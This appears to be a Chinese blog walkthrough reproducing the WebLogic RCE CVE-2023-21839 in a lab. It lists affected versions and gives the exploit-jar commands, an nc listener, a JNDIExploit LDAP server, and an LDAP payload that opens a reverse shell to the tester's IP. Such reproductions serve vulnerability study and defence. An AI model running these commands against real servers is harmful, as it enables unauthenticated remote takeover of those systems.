CVE-2023-21839 weblogic rce漏洞复现

文章目录

  • 一、漏洞影响版本
  • 二、漏洞验证
  • 三、启动反弹shell监听
    • 切换路径到jdk1.8
  • 四、启动ldap服务
  • 五、使用CVE-2023-21839工具来进行攻击测试
  • 六、反弹shell

一、漏洞影响版本

CVE-2023-21839是Weblogic产品中的远程代码执行漏洞,由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功可能会导致Oracle Weblogic服务器被控制,远程注入操作系统命令或代码。

Weblogic 12.2.1.3.0
Weblogic 12.2.1.4.0
Weblogic 14.1.1.0.0

二、漏洞验证

http://192.168.232.131:7001/console/login/LoginForm.jsp
CVE-2023-21839 weblogic rce漏洞复现_第1张图片

java -jar Weblogic-CVE-2023-21839.jar 192.168.232.131:7001 ldap://m08q4j.dnslog.cn/test
执行以上命令可以在dnslog上获得回显,即可验证可能存在该漏洞
CVE-2023-21839 weblogic rce漏洞复现_第2张图片

三、启动反弹shell监听

nc -lvp 2000
在这里插入图片描述

切换路径到jdk1.8

复现之前请务必切换路径到jdk路径下

四、启动ldap服务

C:\Program Files\Java\jdk1.8.0_181\bin>java -jar G:\资料\vulhub复现\weblogic\可行工具\JNDIExploit.v1.2\JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.180.2
CVE-2023-21839 weblogic rce漏洞复现_第3张图片

五、使用CVE-2023-21839工具来进行攻击测试

C:\Program Files\Java\jdk1.8.0_181\bin>java -jar G:\资料\vulhub复现\weblogic\可行工具\Weblogic-CVE-2023-21839.jar 192.168.232.131:7001 ldap://192.168.180.2:1389/Basic/ReverseShell/192.168.180.2/2000
在这里插入图片描述

六、反弹shell

CVE-2023-21839 weblogic rce漏洞复现_第4张图片

你可能感兴趣的:(web安全)